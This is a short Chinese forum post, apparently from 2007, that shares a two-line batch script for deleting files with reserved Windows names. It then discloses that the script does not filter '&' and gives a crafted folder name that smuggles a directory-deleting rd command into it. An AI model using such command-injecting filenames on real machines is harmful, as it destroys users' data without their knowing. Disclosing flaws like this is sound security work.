迅速删除非法文件名代码的 0day
来源:FreeXploiT
allyesno:我们会遇到很多所谓非法的文件名
例如 .. con nul 等等
FlowerCode 给出了以下方法可以快速删除这些文件名
http://hi.baidu.com/flowercode/blog/item/3f68be02a7cfd10d4bfb519f.html
两行代码搞定,迅速删除使用非法文件名的文件及文件夹 2007年06月04日 星期一 19:08
DEL /F /A /Q \?%1
RD /S /Q \?%1
保存为 .bat 或者 .cmd 文件即可。
以后遇到什么 runauto..,com1 之类的,只要将其从资源管理器拖动到此批处理文件上,黑窗口闪过,文件(夹)立即消失。
这个方法 很好用的 不过是有漏洞的
没有过滤掉& 所以我们就可以执行代码啦 呵呵
有两个关键
1.cmd启动的文件夹环境为 C:\Documents and Settings\Administrator
2.rd删除目录要用逗号分离参数而不是空格:)
exp:allyesno&cd..&cd..&rd,你删除了我
这下完了
超级免疫完蛋了